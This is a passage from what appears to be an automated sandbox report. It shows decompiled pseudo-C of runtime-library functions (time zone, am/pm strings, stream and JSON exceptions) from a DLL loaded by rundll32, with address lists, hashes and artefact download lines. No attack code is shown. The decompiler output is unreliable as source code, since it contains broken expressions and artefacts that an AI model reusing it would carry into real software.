										continue;
									}
									break;
								}
								_t181 = _v28;
								goto L27;
							}
						}
						asm("sbb eax, eax");
						_t137 = _t129 & _t175 + 0x00000008;
						_t165 = _t175 + 8;
						if((_t129 & _t175 + 0x00000008) > 0x400) {
							__eflags = _t175 - _t165;
							asm("sbb eax, eax");
							_t183 = E6E24F26D(_t165, _t137 & _t165);
							_v28 = _t183;
							_pop(_t165);
							__eflags = _t183;
							if(__eflags == 0) {
								goto L30;
							}
							 *_t183 = 0xdddd;
							L14:
							_t181 = _t183 + 8;
							goto L18;
						}
						asm("sbb eax, eax");
						E6E2201B0();
						_t183 = _t185;
						_v28 = _t183;
						if(_t183 == 0) {
							goto L30;
						}
						 *_t183 = 0xcccc;
						goto L14;
					}
				}
			}

0x6e247d8a
0x6e247d92
0x6e247d99
0x6e247d9f
0x6e247da2
0x6e247da9
0x6e247dac
0x6e247db2
0x6e247db5
0x6e247db9
0x6e247dbc
0x6e247dc0
0x6e247dc3
0x6e247dda
0x6e247dc5
0x6e247dc8
0x6e247dd2
0x6e247dca
0x6e247dca
0x6e247dca
0x6e247dc8
0x6e247de7
0x00000000
0x6e247ded
0x6e247df6
0x6e247dfd
0x6e247e07
0x6e247e0a
0x6e247e12
0x6e247e1a
0x6e247e22
0x6e247e29
0x6e247e2f
0x6e247e36
0x6e247e38
0x6e247e4e
0x6e247e5c
0x6e247e3a
0x6e247e47
0x6e247e47
0x6e247e61
0x6e247e65
0x00000000
0x6e247e6b
0x6e247e6b
0x6e247e6e
0x6e247e73
0x6e247e77
0x6e247ed1
0x6e247ed1
0x6e247ed3
0x6e247ed3
0x6e247ed8
0x6e247f58
0x6e247f5a
0x6e247f5f
0x6e2481d6
0x6e2481d6
0x6e2481d6
0x6e2481d9
0x6e2481dc
0x00000000
0x00000000
0x6e247f68
0x6e247f6b
0x6e247f42
0x6e247f44
0x6e247f57
0x6e247f57
0x6e247f6d
0x6e247f71
0x6e247f71
0x6e247f73
0x6e247f76
0x6e247f78
0x6e247f7b
0x6e247f7b
0x6e247f7e
0x6e247f7f
0x6e247f7f
0x6e247f84
0x6e247f87
0x6e247f8a
0x6e247f8d
0x6e247f90
0x6e2480c5
0x6e2480c5
0x6e2480c8
0x6e248195
0x6e248195
0x6e248198
0x6e2481b1
0x6e2481b5
0x6e2481b5
0x6e2481b7
0x6e2481b7
0x6e2481c7
0x6e2481cc
0x6e2481cf
0x6e2481d1
0x6e2481ec
0x00000000
0x6e2481f2
0x6e2481d3
0x6e2481d3
0x00000000
0x6e2481d3
0x6e24819a
0x6e24819a
0x6e24819d
0x00000000
0x00000000
0x6e24819f
0x6e24819f
0x6e2481a2
0x6e2481a7
0x6e2481aa
0x6e2481ad
0x00000000
0x6e2481ad
0x6e2480ce
0x6e2480ce
0x6e2480d1
0x6e248181
0x6e248181
0x6e248184
0x6e24818d
0x6e248191
0x6e248191
0x00000000
0x6e248191
0x6e248186
0x6e248186
0x6e248189
0x00000000
0x00000000
0x00000000
0x6e24818b
0x6e2480d7
0x6e2480d7
0x6e2480da
0x6e24816d
0x6e24816d
0x6e248170
0x6e248179
0x6e24817d
0x6e24817d
0x00000000
0x6e24817d
0x6e248172
0x6e248172
0x6e248175
0x00000000
0x00000000
0x00000000
0x6e248177
0x6e2480e0
0x6e2480e0
0x6e2480e3
0x6e24810c
0x6e24810f
0x6e248113
0x6e24811d
0x6e248115
0x6e248115
0x6e248115
0x6e248123
0x6e248126
0x6e248142
0x6e248142
0x6e248145
0x6e248148
0x00000000
0x00000000
0x6e24814e
0x6e248151
0x6e248151
0x6e248154
0x00000000
0x00000000
0x6e248158
0x6e24815b
0x6e24815e
0x6e248161
0x6e248163
0x6e248166
0x6e248169
0x00000000
0x00000000
0x00000000
0x6e24816b
0x6e248128
0x6e248128
0x6e24812b
0x00000000
0x00000000
0x6e24812d
0x6e248135
0x6e248138
0x6e24813b
0x6e24813b
0x00000000
0x6e248126
0x6e2480e5
0x6e2480e8
0x00000000
0x00000000
0x6e2480ef
0x6e2480ef
0x6e2480f2
0x6e248105
0x00000000
0x6e248105
0x6e2480f5
0x6e2480f5
0x6e2480f8
0x00000000
0x00000000
0x6e2480fe
0x00000000
0x6e2480fe
0x6e247f96
0x6e248094
0x6e248094
0x6e248097
0x6e2480ba
0x6e2480be
0x6e2480be
0x00000000
0x6e2480be
0x6e248099
0x6e248099
0x6e24809c
0x00000000
0x00000000
0x6e24809e
0x6e24809e
0x6e2480a1
0x6e2480b3
0x00000000
0x6e2480b3
0x6e2480a3
0x6e2480a3
0x6e2480a6
0x00000000
0x00000000
0x6e2480ac
0x00000000
0x6e2480ac
0x6e247f9c
0x6e247f9f
0x6e248041
0x6e248041
0x6e248046
0x6e24804c
0x6e24804c
0x6e24804d
0x6e248050
0x6e248056
0x6e248059
0x6e24805c
0x00000000
0x00000000
0x6e248062
0x6e248065
0x6e248065
0x6e248068
0x00000000
0x00000000
0x6e248070
0x6e248071
0x6e248074
0x6e248077
0x00000000
0x00000000
0x6e24807f
0x6e248082
0x6e248085
0x6e248087
0x6e24808a
0x6e24808d
0x00000000
0x00000000
0x00000000
0x6e24808f
0x6e248065
0x00000000
0x6e248050
0x6e247fa5
0x6e247fa8
0x6e247fbd
0x6e247fc3
0x6e247fca
0x6e247fcc
0x6e248027
0x6e24802d
0x6e24802e
0x6e248030
0x6e248035
0x6e248035
0x6e247fce
0x6e247fce
0x6e247fd1
0x6e247fd1
0x6e248038
0x00000000
0x6e248038
0x6e247faa
0x6e247fad
0x6e248007
0x6e248007
0x6e24800a
0x6e248016
0x6e24801a
0x6e24801a
0x00000000
0x6e24801a
0x6e24800c
0x6e24800c
0x6e24800f
0x00000000
0x00000000
0x00000000
0x6e248011
0x6e247faf
0x6e247fb2
0x6e247fd6
0x6e247fd6
0x6e247fd9
0x6e247ffc
0x6e248000
0x6e248000
0x00000000
0x6e248000
0x6e247fdb
0x6e247fdb
0x6e247fde
0x00000000
0x00000000
0x6e247fe0
0x6e247fe0
0x6e247fe3
0x6e247ff5
0x00000000
0x6e247ff5
0x6e247fe5
0x6e247fe5
0x6e247fe8
0x00000000
0x00000000
0x6e247fee
0x00000000
0x6e247fee
0x6e247fb4
0x6e247fb7
0x00000000
0x00000000
0x00000000
0x6e247fb7
0x00000000
0x6e2481e2
0x6e247eda
0x6e247ee1
0x6e247f0a
0x6e247ee3
0x6e247ef2
0x6e247ef2
0x6e247f11
0x6e247f13
0x6e247f16
0x6e247f3b
0x6e247f3c
0x00000000
0x6e247f18
0x6e247f18
0x6e247f1b
0x6e247f1e
0x6e247f25
0x6e247f28
0x6e247f2b
0x6e247f2e
0x6e247f31
0x6e247f33
0x6e247f36
0x00000000
0x00000000
0x00000000
0x6e247f36
0x6e247f38
0x00000000
0x6e247f38
0x6e247f16
0x6e247e7e
0x6e247e80
0x6e247e82
0x6e247e8a
0x6e247eaf
0x6e247eb1
0x6e247ebb
0x6e247ebd
0x6e247ec0
0x6e247ec1
0x6e247ec3
0x00000000
0x00000000
0x6e247ec9
0x6e247eaa
0x6e247eaa
0x00000000
0x6e247eaa
0x6e247e8e
0x6e247e92
0x6e247e97
0x6e247e99
0x6e247e9e
0x00000000
0x00000000
0x6e247ea4
0x00000000
0x6e247ea4
0x6e247e65

APIs

__freea.LIBCMT ref: 6E247F3C
__freea.LIBCMT ref: 6E247F5A

Strings

a/p, xrefs: 6E248021
am/pm, xrefs: 6E247FBD

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: __freea
String ID: a/p$am/pm
API String ID: 240046367-3206640213
Opcode ID: 1135db9fb08671d6d60d0ed20f61cfa544f943afaf15cefb0e846a7834a4449f
Instruction ID: 62c3d0ebb481481a39a7dda47ff20ff33918b03a5916278e0e20b5e2f99a19c4
Opcode Fuzzy Hash: 1135db9fb08671d6d60d0ed20f61cfa544f943afaf15cefb0e846a7834a4449f
Instruction Fuzzy Hash: DFD1D37593424FDBDB4D8FE8C850BAAB7B2FF06301F14455AE928AB284E3759940CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6E204267, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E204267(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t38;
				intOrPtr _t39;
				intOrPtr _t44;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t54;
				intOrPtr _t55;
				void* _t56;
				intOrPtr _t58;
				void* _t59;
				signed int _t62;
				signed int _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				signed int _t76;
				intOrPtr _t81;
				signed int _t82;
				void* _t85;
				signed int _t87;
				signed int _t89;

				E6E220117(0x6e2680ee, __ebx, __edi, __esi, 0x20);
				 *((intOrPtr*)(_t85 - 0x14)) = 0x6e2c6b60;
				_t65 = E6E241EEC(L"For");
				_t38 =  *0x6e2c6b60; // 0x6e26aabc
				 *((intOrPtr*)(_t85 - 0x18)) = _t65;
				_t3 = _t38 + 4; // 0x8
				_t39 =  *_t3;
				_t4 = _t39 + 0x6e2c6b84; // 0x0
				_t62 =  *_t4;
				_t5 = _t39 + 0x6e2c6b80; // 0x0
				_t81 =  *_t5;
				_t87 = _t62;
				if(_t87 < 0) {
					L7:
					asm("xorps xmm0, xmm0");
					asm("movlpd [ebp-0x24], xmm0");
					_t62 =  *(_t85 - 0x20);
					_t82 =  *(_t85 - 0x24);
				} else {
					if(_t87 > 0) {
						L6:
						_t82 = _t81 - _t65;
						asm("sbb ebx, esi");
					} else {
						if(_t81 <= 0) {
							goto L7;
						} else {
							_t89 = _t62;
							if(_t89 < 0 || _t89 <= 0 && _t81 <= _t65) {
								goto L7;
							} else {
								goto L6;
							}
						}
					}
				}
				_t8 = _t85 - 0x14; // 0x6e2c6b60
				_push( *_t8);
				E6E20220B(_t62, _t85 - 0x2c, _t82, 0);
				 *((intOrPtr*)(_t85 - 4)) = 0;
				if( *((char*)(_t85 - 0x28)) != 0) {
					 *((char*)(_t85 - 4)) = 1;
					_t67 =  *0x6e2c6b60; // 0x6e26aabc
					_t13 = _t67 + 4; // 0x8
					_t14 =  *_t13 + 0x6e2c6b74; // 0x201
					__eflags = ( *_t14 & 0x000001c0) - 0x40;
					if(( *_t14 & 0x000001c0) == 0x40) {
						L16:
						_t18 = _t67 + 4; // 0x8
						_t44 =  *_t18;
						_t20 = _t44 + 0x6e2c6b98; // 0x6e2c6bb0
						_t46 =  *((intOrPtr*)( *((intOrPtr*)( *_t20)) + 0x24))(L"For",  *((intOrPtr*)(_t85 - 0x18)), 0);
						__eflags = _t46 -  *((intOrPtr*)(_t85 - 0x18));
						if(_t46 !=  *((intOrPtr*)(_t85 - 0x18))) {
							goto L22;
						} else {
							__eflags = _t76;
							if(_t76 != 0) {
								goto L22;
							} else {
								while(1) {
									__eflags = _t62;
									if(__eflags < 0) {
										break;
									}
									if(__eflags > 0) {
										L21:
										_t54 =  *0x6e2c6b60; // 0x6e26aabc
										_t23 = _t54 + 4; // 0x8
										_t55 =  *_t23;
										_t24 = _t55 + 0x6e2c6ba0; // 0x20
										_t25 = _t55 + 0x6e2c6b98; // 0x6e2c6bb0
										_t56 = E6E203F18( *_t25,  *_t24 & 0x0000ffff);
										__eflags = 0xffff - _t56;
										if(0xffff != _t56) {
											_t82 = _t82 + 0xffffffff;
											asm("adc ebx, 0xffffffff");
											continue;
										} else {
											goto L22;
										}
									} else {
										__eflags = _t82;
										if(_t82 <= 0) {
											break;
										} else {
											goto L21;
										}
									}
									goto L25;
								}
								_t63 = 0;
							}
						}
					} else {
						while(1) {
							__eflags = _t62;
							if(__eflags < 0) {
								goto L16;
							}
							if(__eflags > 0) {
								L14:
								_t15 = _t67 + 4; // 0x8
								_t58 =  *_t15;
								_t16 = _t58 + 0x6e2c6ba0; // 0x20
								_t76 =  *_t16 & 0x0000ffff;
								_t17 = _t58 + 0x6e2c6b98; // 0x6e2c6bb0
								_t59 = E6E203F18( *_t17, _t76);
								__eflags = 0xffff - _t59;
								if(0xffff == _t59) {
									L22:
									_t63 = 4;
								} else {
									_t67 =  *0x6e2c6b60; // 0x6e26aabc
									_t82 = _t82 + 0xffffffff;
									asm("adc ebx, 0xffffffff");
									continue;
								}
							} else {
								__eflags = _t82;
								if(_t82 <= 0) {
									goto L16;
								} else {
									goto L14;
								}
							}
							goto L25;
						}
						goto L16;
					}
					L25:
					_t47 =  *0x6e2c6b60; // 0x6e26aabc
					_t26 = _t47 + 4; // 0x8
					_t48 =  *_t26;
					 *((intOrPtr*)(_t48 + 0x6e2c6b80)) = 0;
					 *((intOrPtr*)(_t48 + 0x6e2c6b84)) = 0;
					 *((intOrPtr*)(_t85 - 4)) = 0;
				} else {
					_t63 = 4;
				}
				_t49 =  *0x6e2c6b60; // 0x6e26aabc
				_t30 = _t49 + 4; // 0x8
				_t32 =  *_t30 +  *((intOrPtr*)(_t85 - 0x14)) + 0xc; // 0x0
				E6E203A25( *_t30 +  *((intOrPtr*)(_t85 - 0x14)),  *_t32 | _t63, 0);
				E6E2021C1(_t63, _t85 - 0x2c, _t82,  *_t32 | _t63);
				return E6E220075( *((intOrPtr*)(_t85 - 0x14)));
			}

0x6e20426e
0x6e204278
0x6e204287
0x6e204289
0x6e20428e
0x6e204291
0x6e204291
0x6e204294
0x6e204294
0x6e20429a
0x6e20429a
0x6e2042a0
0x6e2042a2
0x6e2042ba
0x6e2042ba
0x6e2042bd
0x6e2042c2
0x6e2042c5
0x6e2042a4
0x6e2042a4
0x6e2042b4
0x6e2042b4
0x6e2042b6
0x6e2042a6
0x6e2042a8
0x00000000
0x6e2042aa
0x6e2042aa
0x6e2042ac
0x00000000
0x00000000
0x00000000
0x00000000
0x6e2042ac
0x6e2042a8
0x6e2042a4
0x6e2042c8
0x6e2042c8
0x6e2042ce
0x6e2042d3
0x6e2042da
0x6e2042e4
0x6e2042e8
0x6e2042ee
0x6e2042f1
0x6e2042fc
0x6e2042ff
0x6e20433c
0x6e20433c
0x6e20433c
0x6e204343
0x6e204350
0x6e204353
0x6e204356
0x00000000
0x6e204358
0x6e204358
0x6e20435a
0x00000000
0x6e20435c
0x6e20435c
0x6e20435c
0x6e20435e
0x00000000
0x00000000
0x6e204360
0x6e204366
0x6e204366
0x6e20436b
0x6e20436b
0x6e20436e
0x6e204375
0x6e20437c
0x6e204389
0x6e20438c
0x6e204393
0x6e204396
0x00000000
0x00000000
0x00000000
0x00000000
0x6e204362
0x6e204362
0x6e204364
0x00000000
0x00000000
0x00000000
0x00000000
0x6e204364
0x00000000
0x6e204360
0x6e20439b
0x6e20439b
0x6e20435a
0x6e204301
0x6e204301
0x6e204301
0x6e204303
0x00000000
0x00000000
0x6e204305
0x6e20430b
0x6e20430b
0x6e20430b
0x6e20430e
0x6e20430e
0x6e204315
0x6e20431c
0x6e204329
0x6e20432c
0x6e20438e
0x6e204390
0x6e20432e
0x6e20432e
0x6e204334
0x6e204337
0x00000000
0x6e204337
0x6e204307
0x6e204307
0x6e204309
0x00000000
0x00000000
0x00000000
0x00000000
0x6e204309
0x00000000
0x6e204305
0x00000000
0x6e204301
0x6e20439d
0x6e20439d
0x6e2043a2
0x6e2043a2
0x6e2043a5
0x6e2043ab
0x6e2043d6
0x6e2042dc
0x6e2042de
0x6e2042de
0x6e2043d9
0x6e2043df
0x6e2043e5
0x6e2043eb
0x6e2043f3
0x6e204400

APIs

__EH_prolog3_catch.LIBCMT ref: 6E20426E
_wcslen.LIBCMT ref: 6E204281

Strings

`k,n, xrefs: 6E2042C8
For, xrefs: 6E204273, 6E204349

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: H_prolog3_catch_wcslen
String ID: For$`k,n
API String ID: 1260878687-1763375410
Opcode ID: 388df7aa412f50ede240fee3d40f7d71c0cf55d3a2a2837a6dea8f03a4796fad
Instruction ID: 67532f0e83a35c3b0ebb2299c210994367130e8a5225051f6bfa046bdc138d45
Opcode Fuzzy Hash: 388df7aa412f50ede240fee3d40f7d71c0cf55d3a2a2837a6dea8f03a4796fad
Instruction Fuzzy Hash: A6419C79A2021E8FCB40DBE8C5D49ACB7B3BF9AB14B208245E551BB3D1C670E842C790

Uniqueness

Uniqueness Score: -1.00%

Function 6E258AAC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 66%

			E6E258AAC(void* __ebx, void* __edx, void* __edi, void* __eflags) {
				signed int _v8;
				char _v264;
				char _v268;
				char _v272;
				void* __esi;
				void* __ebp;
				signed int _t10;
				void* _t14;
				signed int _t22;
				void* _t28;
				signed int _t37;
				signed int _t43;
				void* _t44;
				signed int _t45;
				signed int _t49;

				_t35 = __edx;
				_t47 = _t49;
				_t10 =  *0x6e2c506c; // 0x2b33ced3
				_v8 = _t10 ^ _t49;
				 *0x6e2c5384 =  *0x6e2c5384 | 0xffffffff;
				 *0x6e2c5378 =  *0x6e2c5378 | 0xffffffff;
				_push(__ebx);
				_push(__edi);
				_t37 = 0;
				 *0x6e2c7a10 = 0;
				_t14 = E6E251216(0x6e272130, __edx, 0, __eflags,  &_v268,  &_v264, 0x100, 0x6e272130);
				if(_t14 != 0) {
					__eflags = _t14 - 0x22;
					if(__eflags == 0) {
						_t45 = E6E24F26D(_t28, _v268);
						__eflags = _t45;
						if(__eflags != 0) {
							_t22 = E6E251216(0x6e272130, __edx, 0, __eflags,  &_v272, _t45, _v268, 0x6e272130);
							__eflags = _t22;
							if(_t22 == 0) {
								E6E24CBD3(0);
								_t37 = _t45;
							} else {
								_push(_t45);
								goto L6;
							}
						} else {
							_push(0);
							L6:
							E6E24CBD3();
						}
					}
				} else {
					_t37 =  &_v264;
				}
				asm("sbb esi, esi");
				_t43 =  ~(_t37 -  &_v264) & _t37;
				if(_t37 == 0) {
					L14:
					E6E258951(0x6e272130, _t37, __eflags);
				} else {
					_t57 =  *_t37;
					if( *_t37 == 0) {
						goto L14;
					} else {
						_push(_t37);
						E6E25877C(0x6e272130, _t37, _t57);
					}
				}
				E6E24CBD3(_t43);
				_pop(_t44);
				return E6E21F8A5(_v8 ^ _t47, _t35, _t44);
			}

0x6e258aac
0x6e258aaf
0x6e258ab7
0x6e258abe
0x6e258ac1
0x6e258ace
0x6e258ad5
0x6e258ad7
0x6e258add
0x6e258aec
0x6e258af3
0x6e258afd
0x6e258b07
0x6e258b0a
0x6e258b17
0x6e258b1a
0x6e258b1c
0x6e258b35
0x6e258b3d
0x6e258b3f
0x6e258b45
0x6e258b4a
0x6e258b41
0x6e258b41
0x00000000
0x6e258b41
0x6e258b1e
0x6e258b1e
0x6e258b1f
0x6e258b1f
0x6e258b1f
0x6e258b4c
0x6e258aff
0x6e258aff
0x6e258aff
0x6e258b59
0x6e258b5b
0x6e258b5f
0x6e258b6f
0x6e258b6f
0x6e258b61
0x6e258b61
0x6e258b64
0x00000000
0x6e258b66
0x6e258b66
0x6e258b67
0x6e258b6c
0x6e258b64
0x6e258b75
0x6e258b7f
0x6e258b8b

APIs

_free.LIBCMT ref: 6E258B1F
_free.LIBCMT ref: 6E258B75

Part of subcall function 6E258951: _free.LIBCMT ref: 6E2589A9
Part of subcall function 6E258951: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6E272130), ref: 6E2589BB
Part of subcall function 6E258951: WideCharToMultiByte.KERNEL32(00000000,00000000,6E2C7A1C,000000FF,00000000,0000003F,00000000,?,?), ref: 6E258A33
Part of subcall function 6E258951: WideCharToMultiByte.KERNEL32(00000000,00000000,6E2C7A70,000000FF,?,0000003F,00000000,?), ref: 6E258A60

Strings

0!'n, xrefs: 6E258AD8

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID: 0!'n
API String ID: 314583886-2553279824
Opcode ID: 0b56662eb3f08cfb7a96f3ed6336703de2b06adc9c70305fabc973a387e0a5ee
Instruction ID: 2d7148b183a6b827f0dbd635795aa4ac155bef34ca229043efccfa8fcf4cf7c1
Opcode Fuzzy Hash: 0b56662eb3f08cfb7a96f3ed6336703de2b06adc9c70305fabc973a387e0a5ee
Instruction Fuzzy Hash: DF217CB6C1421D9BDB2887A8CE44DDBB37FCB81720F1006A5D455E6340DBB04D90C5A0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E1EEA, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 40%

			E6E1E1EEA(void* __ecx, void* __edx, void* __esi, signed int _a4, char _a8) {
				char _v12;
				char _v32;
				signed int _t14;
				void* _t19;
				signed char _t24;
				void* _t27;
				char* _t31;

				_t27 = __edx;
				_t14 = _a4 & 0x00000017;
				 *(__ecx + 0xc) = _t14;
				_t24 =  *(__ecx + 0x10) & _t14;
				if(_t24 == 0) {
					return _t14;
				} else {
					if(_a8 != 0) {
						_push(0);
						_push(0);
					} else {
						if((_t24 & 0x00000004) == 0) {
							_t31 =  ==  ? "ios_base::eofbit set" : "ios_base::failbit set";
						} else {
							_t31 = "ios_base::badbit set";
						}
						_t19 = E6E1E1CA2(_t24, _t27,  &_v12, 1);
						_t24 =  &_v32;
						E6E1E1EBD(_t24, _t31, _t19);
						_push(0x6e2c3568);
						_push( &_v32);
					}
					E6E223D74();
					asm("int3");
					return  *((intOrPtr*)(_t24 + 0xc));
				}
			}

0x6e1e1eea
0x6e1e1ef3
0x6e1e1ef6
0x6e1e1efd
0x6e1e1eff
0x6e1e1f47
0x6e1e1f01
0x6e1e1f05
0x6e1e1f4a
0x6e1e1f4c
0x6e1e1f07
0x6e1e1f0a
0x6e1e1f20
0x6e1e1f0c
0x6e1e1f0c
0x6e1e1f0c
0x6e1e1f29
0x6e1e1f32
0x6e1e1f35
0x6e1e1f3a
0x6e1e1f42
0x6e1e1f42
0x6e1e1f4e
0x6e1e1f53
0x6e1e1f57
0x6e1e1f57

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 6E1E1F4E

Strings

ios_base::eofbit set, xrefs: 6E1E1F1B
ios_base::badbit set, xrefs: 6E1E1F0C, 6E1E1F31
ios_base::failbit set, xrefs: 6E1E1F16

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 49bfbd02ac0c7b664a1dae2fe1523bbc64c5067317e86750fd35a371e3dbabac
Instruction ID: 6898c8c95af63bb64c1bd810da426ff31557d66aa9f6f58dc9a9725a31fc5930
Opcode Fuzzy Hash: 49bfbd02ac0c7b664a1dae2fe1523bbc64c5067317e86750fd35a371e3dbabac
Instruction Fuzzy Hash: 02F0F4B2E446192FDF54DBD8C802FDA73A96B14314F208845F951AB582EB75A889C790

Uniqueness

Uniqueness Score: -1.00%

Function 6E20407D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E6E20407D(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t30;
				void* _t33;

				E6E2200AC(0x6e26808e, __ebx, __edi, __esi, 8);
				_t30 = __ecx;
				 *((intOrPtr*)(_t33 - 0x14)) = __ecx;
				 *((intOrPtr*)(_t33 - 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0xf;
				 *((char*)(__ecx)) = 0;
				 *((intOrPtr*)(_t33 - 4)) = 0;
				 *((intOrPtr*)(_t33 - 0x10)) = 1;
				E6E205192(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t33 + 8)) + 0x10)) + E6E241D60("[json.exception."));
				E6E202D14(_t30, "[json.exception.", E6E241D60("[json.exception."));
				E6E201F57( *((intOrPtr*)(_t33 + 8)));
				return E6E220075(_t30);
			}

0x6e204084
0x6e204089
0x6e20408b
0x6e204090
0x6e204093
0x6e204096
0x6e20409d
0x6e2040a4
0x6e2040a8
0x6e2040c0
0x6e2040d0
0x6e2040d8
0x6e2040e4

APIs

__EH_prolog3.LIBCMT ref: 6E204084
_strlen.LIBCMT ref: 6E2040AF
_strlen.LIBCMT ref: 6E2040C6

Strings

[json.exception., xrefs: 6E20409F, 6E2040A7, 6E2040C5, 6E2040CD

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: _strlen$H_prolog3
String ID: [json.exception.
API String ID: 2883720156-791563284
Opcode ID: 6482fbad8b00c91d55268247e91ae520689531c08aaf8be9be6c08693ad865bf
Instruction ID: ed24d3b07345910740ac1649ea3544e7153a155586584edc6b9706bbbf42f53f
Opcode Fuzzy Hash: 6482fbad8b00c91d55268247e91ae520689531c08aaf8be9be6c08693ad865bf
Instruction Fuzzy Hash: 64F036B5600219AFDB189FB8C8506FEB6EFBF44708F540919E409DB281DBB45D548791

Uniqueness

Uniqueness Score: -1.00%

Function 6E24F345, Relevance: 6.3, APIs: 4, Instructions: 305
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E6E24F345(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E6E231F60(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
